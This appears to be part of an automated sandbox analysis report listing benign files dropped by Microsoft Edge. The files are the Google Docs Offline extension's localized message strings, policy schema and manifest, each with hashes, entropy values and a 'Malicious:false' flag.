                                                                                                                                                                                                                                                                                    SHA-512:22596584D10707CC1C8179ED3ABE46EF2C314CF9C3D0685921475944B8855AAB660590F8FA1CFDCE7976B4BB3BD9ABBBF053F61F1249A325FD0094E1C95692ED
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:{.. "createnew": {.. "message": "CREEAZ. UN DOCUMENT".. },.. "explanationofflinedisabled": {.. "message": "E.ti offline. Pentru a utiliza Documente Google f.r. conexiune la internet, intr. .n set.rile din pagina principal. Documente Google .i activeaz. sincronizarea offline data viitoare c.nd e.ti conectat(.) la internet.".. },.. "explanationofflineenabled": {.. "message": "E.ti offline, dar po.i .nc. s. editezi fi.ierele disponibile sau s. creezi altele.".. },.. "extdesc": {.. "message": "Editeaz., creeaz. .i acceseaz. documente, foi de calcul .i prezent.ri - totul f.r. acces la internet.".. },.. "extname": {.. "message": "Documente Google Offline".. },.. "learnmore": {.. "message": "Afl. mai multe".. },.. "popuphelptext": {.. "message": "Scrie, editeaz. .i colaboreaz. oriunde ai fi, cu sau f.r. conexiune la internet.".. }..}..
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):1337
                                                                                                                                                                                                                                                                                    Entropy (8bit):4.69531415794894
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:24:1HABEapHTEmxUomjsfDVs8THjqBK8/hHUg41v+Lph5eFTHQ:I/VdxUomjsre8Kh4Riph5eFU
                                                                                                                                                                                                                                                                                    MD5:51D34FE303D0C90EE409A2397FCA437D
                                                                                                                                                                                                                                                                                    SHA1:B4B9A7B19C62D0AA95D1F10640A5FBA628CCCA12
                                                                                                                                                                                                                                                                                    SHA-256:BE733625ACD03158103D62BC0EEF272CA3F265AC30C87A6A03467481A177DAE3
                                                                                                                                                                                                                                                                                    SHA-512:E8670DED44DC6EE30E5F41C8B2040CF8A463CD9A60FC31FA70EB1D4C9AC1A3558369792B5B86FA761A21F5266D5A35E5C2C39297F367DAA84159585C19EC492A
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):2846
                                                                                                                                                                                                                                                                                    Entropy (8bit):3.7416822879702547
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:48:YWi+htQTKEQb3aXQYJLSWy7sTQThQTnQtQTrEmQ6kiLsegQSJFwsQGaiPn779I+S:zhiTK5b3tUGVjTGTnQiTryOLpyaxYf/S
                                                                                                                                                                                                                                                                                    MD5:B8A4FD612534A171A9A03C1984BB4BDD
                                                                                                                                                                                                                                                                                    SHA1:F513F7300827FE352E8ECB5BD4BB1729F3A0E22A
                                                                                                                                                                                                                                                                                    SHA-256:54241EBE651A8344235CC47AFD274C080ABAEBC8C3A25AFB95D8373B6A5670A2
                                                                                                                                                                                                                                                                                    SHA-512:C03E35BFDE546AEB3245024EF721E7E606327581EFE9EAF8C5B11989D9033BDB58437041A5CB6D567BAA05466B6AAF054C47F976FD940EEEDF69FDF80D79095B
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):934
                                                                                                                                                                                                                                                                                    Entropy (8bit):4.882122893545996
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:24:1HAF8pMv1RS4LXL22IUjdh8uJwpPqLDEtxKLhSS:hyv1RS4LXx38u36QsS
                                                                                                                                                                                                                                                                                    MD5:8E55817BF7A87052F11FE554A61C52D5
                                                                                                                                                                                                                                                                                    SHA1:9ABDC0725FE27967F6F6BE0DF5D6C46E2957F455
                                                                                                                                                                                                                                                                                    SHA-256:903060EC9E76040B46DEB47BBB041D0B28A6816CB9B892D7342FC7DC6782F87C
                                                                                                                                                                                                                                                                                    SHA-512:EFF9EC7E72B272DDE5F29123653BC056A4BC2C3C662AE3C448F8CB6A4D1865A0679B7E74C1B3189F3E262109ED6BC8F8D2BDE14AEFC8E87E0F785AE4837D01C7
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:{.. "createnew": {.. "message": "VYTVORI. NOV.".. },.. "explanationofflinedisabled": {.. "message": "Ste offline. Ak chcete pou.i. Dokumenty Google bez pripojenia na internet, po najbli..om pripojen. na internet prejdite do nastaven. na domovskej str.nke Dokumentov Google a.zapnite offline synchroniz.ciu.".. },.. "explanationofflineenabled": {.. "message": "Ste offline, no st.le m..ete upravova. dostupn. s.bory a.vytv.ra. nov..".. },.. "extdesc": {.. "message": ".prava, tvorba a.zobrazenie dokumentov, tabuliek a.prezent.ci.. To v.etko bez pr.stupu na internet.".. },.. "extname": {.. "message": "Dokumenty Google v re.ime offline".. },.. "learnmore": {.. "message": ".al.ie inform.cie".. },.. "popuphelptext": {.. "message": "P..te, upravujte a.spolupracuje, kdeko.vek ste, a.to s.pripojen.m na internet aj bez neho.".. }..}..
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):963
                                                                                                                                                                                                                                                                                    Entropy (8bit):4.6041913416245
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:12:1HASvgfECBxNFCEuKXowwJrpvPwNgEcPJJJEfWOCBxeFCJuGuU4KYXCSUXKDxX4A:1HAXMKYw8VYNLcaeDmKYLdX2zJBG5
                                                                                                                                                                                                                                                                                    MD5:BFAEFEFF32813DF91C56B71B79EC2AF4
                                                                                                                                                                                                                                                                                    SHA1:F8EDA2B632610972B581724D6B2F9782AC37377B
                                                                                                                                                                                                                                                                                    SHA-256:AAB9CF9098294A46DC0F2FA468AFFF7CA7C323A1A0EFA70C9DB1E3A4DA05D1D4
                                                                                                                                                                                                                                                                                    SHA-512:971F2BBF5E9C84DE3D31E5F2A4D1A00D891A2504F8AF6D3F75FC19056BFD059A270C4C9836AF35258ABA586A1888133FB22B484F260C1CBC2D1D17BC3B4451AA
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:{.. "createnew": {.. "message": "USTVARI NOVO".. },.. "explanationofflinedisabled": {.. "message": "Nimate vzpostavljene povezave. .e .elite uporabljati Google Dokumente brez internetne povezave, odprite nastavitve na doma.i strani Google Dokumentov in vklopite sinhronizacijo brez povezave, ko naslednji. vzpostavite internetno povezavo.".. },.. "explanationofflineenabled": {.. "message": "Nimate vzpostavljene povezave, vendar lahko .e vedno urejate razpolo.ljive datoteke ali ustvarjate nove.".. },.. "extdesc": {.. "message": "Urejajte, ustvarjajte in si ogledujte dokumente, preglednice in predstavitve . vse to brez internetnega dostopa.".. },.. "extname": {.. "message": "Google Dokumenti brez povezave".. },.. "learnmore": {.. "message": "Ve. o tem".. },.. "popuphelptext": {.. "message": "Pi.ite, urejajte in sodelujte, kjer koli ste, z internetno povezavo ali brez nje.".. }..}..
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):1320
                                                                                                                                                                                                                                                                                    Entropy (8bit):4.569671329405572
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:24:1HArg/fjQg2JwrfZtUWTrw1P4epMnRGi5TBmuPDRxZQ/XtiCw/Rwh/Q9EVz:ogUg2JwDZe6rwKI8VTP9xK1CwhI94
                                                                                                                                                                                                                                                                                    MD5:7F5F8933D2D078618496C67526A2B066
                                                                                                                                                                                                                                                                                    SHA1:B7050E3EFA4D39548577CF47CB119FA0E246B7A4
                                                                                                                                                                                                                                                                                    SHA-256:4E8B69E864F57CDDD4DC4E4FAF2C28D496874D06016BC22E8D39E0CB69552769
                                                                                                                                                                                                                                                                                    SHA-512:0FBAB56629368EEF87DEEF2977CA51831BEB7DEAE98E02504E564218425C751853C4FDEAA40F51ECFE75C633128B56AE105A6EB308FD5B4A2E983013197F5DBA
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:{.. "createnew": {.. "message": "....... ....".. },.. "explanationofflinedisabled": {.. "message": "...... .... .. ..... ......... Google ......... ... ........ ...., ..... . .......... .. ........ ........ Google .......... . ........ ...... .............. ... ....... ... ...... ........ .. ...........".. },.. "explanationofflineenabled": {.. "message": "...... ..., ... . .... ...... .. ....... ...... . ........ ........ ... .. ....... .....".. },.. "extdesc": {.. "message": "....... . ........... ........., ...... . ............ . ....... ...... . ... . ... .. ... ........ .........".. },.. "extname": {.. "message
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):884
                                                                                                                                                                                                                                                                                    Entropy (8bit):4.627108704340797
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:24:1HA0NOYT/6McbnX/yzklyOIPRQrJlvDymvBd:vNOcyHnX/yg0P4Bymn
                                                                                                                                                                                                                                                                                    MD5:90D8FB448CE9C0B9BA3D07FB8DE6D7EE
                                                                                                                                                                                                                                                                                    SHA1:D8688CAC0245FD7B886D0DEB51394F5DF8AE7E84
                                                                                                                                                                                                                                                                                    SHA-256:64B1E422B346AB77C5D1C77142685B3FF7661D498767D104B0C24CB36D0EB859
                                                                                                                                                                                                                                                                                    SHA-512:6D58F49EE3EF0D3186EA036B868B2203FE936CE30DC8E246C32E90B58D9B18C624825419346B62AF8F7D61767DBE9721957280AA3C524D3A5DFB1A3A76C00742
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:{.. "createnew": {.. "message": "SKAPA NYTT".. },.. "explanationofflinedisabled": {.. "message": "Du .r offline. Om du vill anv.nda Google Dokument utan internetuppkoppling, .ppna inst.llningarna p. Google Dokuments startsida och aktivera offlinesynkronisering n.sta g.ng du .r ansluten till internet.".. },.. "explanationofflineenabled": {.. "message": "Du .r offline, men det g.r fortfarande att redigera tillg.ngliga filer eller skapa nya.".. },.. "extdesc": {.. "message": "Redigera, skapa och visa dina dokument, kalkylark och presentationer . helt utan internet.tkomst.".. },.. "extname": {.. "message": "Google Dokument Offline".. },.. "learnmore": {.. "message": "L.s mer".. },.. "popuphelptext": {.. "message": "Skriv, redigera och samarbeta .verallt, med eller utan internetanslutning.".. }..}..
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):980
                                                                                                                                                                                                                                                                                    Entropy (8bit):4.50673686618174
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:12:1HASvgNHCBxNx1HMHyMhybK7QGU78oCuafIvfCBxex6EYPE5E1pOCSUJqONtCBh8:1HAGDQ3y0Q/Kjp/zhDoKMkeAT6dBaX
                                                                                                                                                                                                                                                                                    MD5:D0579209686889E079D87C23817EDDD5
                                                                                                                                                                                                                                                                                    SHA1:C4F99E66A5891973315D7F2BC9C1DAA524CB30DC
                                                                                                                                                                                                                                                                                    SHA-256:0D20680B74AF10EF8C754FCDE259124A438DCE3848305B0CAF994D98E787D263
                                                                                                                                                                                                                                                                                    SHA-512:D59911F91ED6C8FF78FD158389B4D326DAF4C031B940C399569FE210F6985E23897E7F404B7014FC7B0ACEC086C01CC5F76354F7E5D3A1E0DEDEF788C23C2978
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:{.. "createnew": {.. "message": "FUNGUA MPYA".. },.. "explanationofflinedisabled": {.. "message": "Haupo mtandaoni. Ili uweze kutumia Hati za Google bila muunganisho wa intaneti, wakati utakuwa umeunganishwa kwenye intaneti, nenda kwenye sehemu ya mipangilio kwenye ukurasa wa kwanza wa Hati za Google kisha uwashe kipengele cha usawazishaji nje ya mtandao.".. },.. "explanationofflineenabled": {.. "message": "Haupo mtandaoni, lakini bado unaweza kubadilisha faili zilizopo au uunde mpya.".. },.. "extdesc": {.. "message": "Badilisha, unda na uangalie hati, malahajedwali na mawasilisho yako . yote bila kutumia muunganisho wa intaneti.".. },.. "extname": {.. "message": "Hati za Google Nje ya Mtandao".. },.. "learnmore": {.. "message": "Pata Maelezo Zaidi".. },.. "popuphelptext": {.. "message": "Andika hati, zibadilishe na ushirikiane na wengine popote ulipo, iwe una muunganisho wa intaneti au huna.".. }..}..
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):1941
                                                                                                                                                                                                                                                                                    Entropy (8bit):4.132139619026436
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:24:1HAoTZwEj3YfVLiANpx96zjlXTwB4uNJDZwq3CP1B2xIZiIH1CYFIZ03SoFyxrph:JCEjWiAD0ZXkyYFyPND1L/I
                                                                                                                                                                                                                                                                                    MD5:DCC0D1725AEAEAAF1690EF8053529601
                                                                                                                                                                                                                                                                                    SHA1:BB9D31859469760AC93E84B70B57909DCC02EA65
                                                                                                                                                                                                                                                                                    SHA-256:6282BF9DF12AD453858B0B531C8999D5FD6251EB855234546A1B30858462231A
                                                                                                                                                                                                                                                                                    SHA-512:6243982D764026D342B3C47C706D822BB2B0CAFFA51F0591D8C878F981EEF2A7FC68B76D012630B1C1EB394AF90EB782E2B49329EB6538DD5608A7F0791FDCF5
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:{.. "createnew": {.. "message": "..... ....... .........".. },.. "explanationofflinedisabled": {.. "message": ".......... ........... .... ....... ..... Google ......... .........., ...... .... ........... ......... ...., Google ... ................... ................ ......, ........ ......... ..........".. },.. "explanationofflineenabled": {.. "message": ".......... ..........., .......... .......... .......... ......... ........... ...... .....
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):1969
                                                                                                                                                                                                                                                                                    Entropy (8bit):4.327258153043599
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:48:R7jQrEONienBcFNBNieCyOBw0/kCcj+sEf24l+Q+u1LU4ljCj55ONipR41ssrNix:RjQJN1nBcFNBNlCyGcj+RXl+Q+u1LU4s
                                                                                                                                                                                                                                                                                    MD5:385E65EF723F1C4018EEE6E4E56BC03F
                                                                                                                                                                                                                                                                                    SHA1:0CEA195638A403FD99BAEF88A360BD746C21DF42
                                                                                                                                                                                                                                                                                    SHA-256:026C164BAE27DBB36A564888A796AA3F188AAD9E0C37176D48910395CF772CEA
                                                                                                                                                                                                                                                                                    SHA-512:E55167CB5638E04DF3543D57C8027B86B9483BFCAFA8E7C148EDED66454AEBF554B4C1CF3C33E93EC63D73E43800D6A6E7B9B1A1B0798B6BDB2F699D3989B052
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:{.. "createnew": {.. "message": "..... ...... ........ ......".. },.. "explanationofflinedisabled": {.. "message": ".... ........... ........ ......... ........ ....... Google Docs... .............., .... ............ ....... ..... ...... .... Google Docs .... ...... ............. ......, ........ ........ ... .......".. },.. "explanationofflineenabled": {.. "message": ".... ........... ......., .... .... ........ .......... .... ....... ..... ....... .... ..
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):1674
                                                                                                                                                                                                                                                                                    Entropy (8bit):4.343724179386811
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:48:fcGjnU3UnGKD1GeU3pktOggV1tL2ggG7Q:f3jnDG1eUk0g6RLE
                                                                                                                                                                                                                                                                                    MD5:64077E3D186E585A8BEA86FF415AA19D
                                                                                                                                                                                                                                                                                    SHA1:73A861AC810DABB4CE63AD052E6E1834F8CA0E65
                                                                                                                                                                                                                                                                                    SHA-256:D147631B2334A25B8AA4519E4A30FB3A1A85B6A0396BC688C68DC124EC387D58
                                                                                                                                                                                                                                                                                    SHA-512:56DD389EB9DD335A6214E206B3BF5D63562584394D1DE1928B67D369E548477004146E6CB2AD19D291CB06564676E2B2AC078162356F6BC9278B04D29825EF0C
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:{.. "createnew": {.. "message": ".........".. },.. "explanationofflinedisabled": {.. "message": ".............. ............. Google .................................... ............................... Google ...... .................................................................".. },.. "explanationofflineenabled": {.. "message": "................................................................".. },.. "extdesc": {.. "message": "..... ..... ........
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):1063
                                                                                                                                                                                                                                                                                    Entropy (8bit):4.853399816115876
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:24:1HAowYuBPgoMC4AGehrgGm7tJ3ckwFrXnRs5m:GYsPgrCtGehkGc3cvXr
                                                                                                                                                                                                                                                                                    MD5:76B59AAACC7B469792694CF3855D3F4C
                                                                                                                                                                                                                                                                                    SHA1:7C04A2C1C808FA57057A4CCEEE66855251A3C231
                                                                                                                                                                                                                                                                                    SHA-256:B9066A162BEE00FD50DC48C71B32B69DFFA362A01F84B45698B017A624F46824
                                                                                                                                                                                                                                                                                    SHA-512:2E507CA6874DE8028DC769F3D9DFD9E5494C268432BA41B51568D56F7426F8A5F2E5B111DDD04259EB8D9A036BB4E3333863A8FC65AAB793BCEF39EDFE41403B
Malicious:false
Preview:{.. "createnew": {.. "message": "YEN. OLU.TUR".. },.. "explanationofflinedisabled": {.. "message": ".nternet'e ba.l. de.ilsiniz. Google Dok.manlar'. .nternet ba.lant.s. olmadan kullanmak i.in, .nternet'e ba.lanabildi.inizde Google Dok.manlar ana sayfas.nda Ayarlar'a gidin ve .evrimd... senkronizasyonu etkinle.tirin.".. },.. "explanationofflineenabled": {.. "message": ".nternet'e ba.l. de.ilsiniz. Ancak, yine de mevcut dosyalar. d.zenleyebilir veya yeni dosyalar olu.turabilirsiniz.".. },.. "extdesc": {.. "message": "Dok.man, e-tablo ve sunu olu.turun, bunlar. d.zenleyin ve g.r.nt.leyin. T.m bu i.lemleri internet eri.imi olmadan yapabilirsiniz.".. },.. "extname": {.. "message": "Google Dok.manlar .evrimd...".. },.. "learnmore": {.. "message": "Daha Fazla Bilgi".. },.. "popuphelptext": {.. "message": ".nternet ba.lant.n.z olsun veya olmas.n, nerede olursan.z olun yaz.n, d.zenl
Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:JSON data
Category:dropped
Size (bytes):1333
Entropy (8bit):4.686760246306605
Encrypted:false
Malicious:false
Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:JSON data
Category:dropped
Size (bytes):1263
Entropy (8bit):4.861856182762435
Encrypted:false
Malicious:false
Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:JSON data
Category:dropped
Size (bytes):1074
Entropy (8bit):5.062722522759407
Encrypted:false
Malicious:false
Preview:{.. "createnew": {.. "message": "T.O M.I".. },.. "explanationofflinedisabled": {.. "message": "B.n .ang ngo.i tuy.n. .. s. d.ng Google T.i li.u m. kh.ng c.n k.t n.i Internet, .i ..n c.i ..t tr.n trang ch. c.a Google T.i li.u v. b.t ..ng b. h.a ngo.i tuy.n v.o l.n ti.p theo b.n ...c k.t n.i v.i m.ng Internet.".. },.. "explanationofflineenabled": {.. "message": "B.n .ang ngo.i tuy.n, tuy nhi.n b.n v.n c. th. ch.nh s.a c.c t.p c. s.n ho.c t.o c.c t.p m.i.".. },.. "extdesc": {.. "message": "Ch.nh s.a, t.o v. xem t.i li.u, b.ng t.nh v. b.n tr.nh b.y . t.t c. m. kh.ng c.n truy c.p Internet.".. },.. "extname": {.. "message": "Google T.i li.u ngo.i tuy.n".. },.. "learnmore": {.. "message": "Ti.m hi..u th.m".. },.. "popuphelptext": {.. "message": "Vi.t, ch.nh s.a v. c.ng t.c
Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:JSON data
Category:dropped
Size (bytes):879
Entropy (8bit):5.7905809868505544
Encrypted:false
Malicious:false
Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:JSON data
Category:dropped
Size (bytes):1205
Entropy (8bit):4.50367724745418
Encrypted:false
Malicious:false
Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:JSON data
Category:dropped
Size (bytes):843
Entropy (8bit):5.76581227215314
Encrypted:false
Malicious:false
Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:JSON data
Category:dropped
Size (bytes):912
Entropy (8bit):4.65963951143349
Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:24:YlMBKqLnI7EgBLWFQbTQIF+j4h3OadMJzLWnCieqgwLeOvKrCRPE:YlMBKqjI7EQOQb0Pj4heOWqeyaBrMPE
                                                                                                                                                                                                                                                                                    MD5:71F916A64F98B6D1B5D1F62D297FDEC1
                                                                                                                                                                                                                                                                                    SHA1:9386E8F723C3F42DA5B3F7E0B9970D2664EA0BAA
                                                                                                                                                                                                                                                                                    SHA-256:EC78DDD4CCF32B5D76EC701A20167C3FBD146D79A505E4FB0421FC1E5CF4AA63
                                                                                                                                                                                                                                                                                    SHA-512:30FA4E02120AF1BE6E7CC7DBB15FAE5D50825BD6B3CF28EF21D2F2E217B14AF5B76CFCC165685C3EDC1D09536BFCB10CA07E1E2CC0DA891CEC05E19394AD7144
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:{"createnew":{"message":"DALA ENTSHA"},"explanationofflinedisabled":{"message":"Awuxhunyiwe ku-inthanethi. Ukuze usebenzise i-Google Amadokhumenti ngaphandle koxhumano lwe-inthanethi, iya kokuthi izilungiselelo ekhasini lasekhaya le-Google Amadokhumenti bese uvula ukuvumelanisa okungaxhunyiwe ku-inthanethi ngesikhathi esilandelayo lapho uxhunywe ku-inthanethi."},"explanationofflineenabled":{"message":"Awuxhunyiwe ku-inthanethi, kodwa usangakwazi ukuhlela amafayela atholakalayo noma udale amasha."},"extdesc":{"message":"Hlela, dala, futhi ubuke amadokhumenti akho, amaspredishithi, namaphrezentheshini \u2014 konke ngaphandle kokufinyelela kwe-inthanethi."},"extname":{"message":"I-Google Amadokhumenti engaxhumekile ku-intanethi"},"learnmore":{"message":"Funda kabanzi"},"popuphelptext":{"message":"Bhala, hlela, futhi hlanganyela noma yikuphi lapho okhona, unalo noma ungenalo uxhumano lwe-inthanethi."}}.
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):11406
                                                                                                                                                                                                                                                                                    Entropy (8bit):5.745845607168024
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:192:RBG1G1UPkUj/86Op//Ier/2nsNLJtwg+K8HNnswuH+svyw6r+cgTSJJT4LGkt:m8IEI4u8/EgG4
                                                                                                                                                                                                                                                                                    MD5:0A68C9539A188B8BB4F9573F2F2321D6
                                                                                                                                                                                                                                                                                    SHA1:E0F814FA4DCC04EDC6A5D39CBC1038979E88F0E5
                                                                                                                                                                                                                                                                                    SHA-256:39E6C25D096AFD156644F07586D85E37F1F7B3DA9B636471E8D15CEB14DB184F
                                                                                                                                                                                                                                                                                    SHA-512:13F133C173C6622B8E1B6F86A551CBC5B0B2446B3CF96E4AE8CA2646009B99E4A360C2DB3168CB94A488FAEBD215003DFA60D10150B7A85B5F8919900BD01CCC
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:[{"description":"treehash per file","signed_content":{"payload":"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
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):854
                                                                                                                                                                                                                                                                                    Entropy (8bit):4.284628987131403
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:12:ont+QByTwnnGNcMbyWM+Q9TZldnnnGGxlF/S0WOtUL0M0r:vOrGe4dDCVGOjWJ0nr
                                                                                                                                                                                                                                                                                    MD5:4EC1DF2DA46182103D2FFC3B92D20CA5
                                                                                                                                                                                                                                                                                    SHA1:FB9D1BA3710CF31A87165317C6EDC110E98994CE
                                                                                                                                                                                                                                                                                    SHA-256:6C69CE0FE6FAB14F1990A320D704FEE362C175C00EB6C9224AA6F41108918CA6
                                                                                                                                                                                                                                                                                    SHA-512:939D81E6A82B10FF73A35C931052D8D53D42D915E526665079EEB4820DF4D70F1C6AEBAB70B59519A0014A48514833FEFD687D5A3ED1B06482223A168292105D
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:{. "type": "object",. "properties": {. "allowedDocsOfflineDomains": {. "type": "array",. "items": {. "type": "string". },. "title": "Allow users to enable Docs offline for the specified managed domains.",. "description": "Users on managed devices will be able to enable docs offline if they are part of the specified managed domains.". },. "autoEnabledDocsOfflineDomains": {. "type": "array",. "items": {. "type": "string". },. "title": "Auto enable Docs offline for the specified managed domains in certain eligible situations.",. "description": "Users on managed devices, in certain eligible situations, will be able to automatically access and edit recent files offline for the managed domains set in this property. They can still disable it from Drive settings.". }. }.}.
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):2525
                                                                                                                                                                                                                                                                                    Entropy (8bit):5.417954053901
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:24:1HEZ4WPoolELb/KxktGw3VwELb/4iL2QDkUpvdz1xxy/Atj17x9yiVvQe:WdP5aLTKQGwlTLT4oRvvxs/AP7xgiVb
                                                                                                                                                                                                                                                                                    MD5:5E425DC36364927B1348F6C48B68C948
                                                                                                                                                                                                                                                                                    SHA1:9E411B88453DEF3F7CFCB3EAA543C69AD832B82F
                                                                                                                                                                                                                                                                                    SHA-256:32D9C8DE71A40D71FC61AD52AA07E809D07DF57A2F4F7855E8FC300F87FFC642
                                                                                                                                                                                                                                                                                    SHA-512:C19217B9AF82C1EE1015D4DFC4234A5CE0A4E482430455ABAAFAE3F9C8AE0F7E5D2ED7727502760F1B0656F0A079CB23B132188AE425E001802738A91D8C5D79
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:{.. "author": {.. "email": "docs-hosted-app-own@google.com".. },.. "background": {.. "service_worker": "service_worker_bin_prod.js".. },.. "content_capabilities": {.. "matches": [ "https://docs.google.com/*", "https://drive.google.com/*", "https://drive-autopush.corp.google.com/*", "https://drive-daily-0.corp.google.com/*", "https://drive-daily-1.corp.google.com/*", "https://drive-daily-2.corp.google.com/*", "https://drive-daily-3.corp.google.com/*", "https://drive-daily-4.corp.google.com/*", "https://drive-daily-5.corp.google.com/*", "https://drive-daily-6.corp.google.com/*", "https://drive-preprod.corp.google.com/*", "https://drive-staging.corp.google.com/*" ],.. "permissions": [ "clipboardRead", "clipboardWrite", "unlimitedStorage" ].. },.. "content_security_policy": {.. "extension_pages": "script-src 'self'; object-src 'self'".. },.. "default_locale": "en_US",.. "description": "__MSG_extDesc__",.. "externally_connectable": {.. "ma
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:HTML document, ASCII text
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):97
                                                                                                                                                                                                                                                                                    Entropy (8bit):4.862433271815736
                                                                                                                                                                                                                                                                                    Encrypted:false
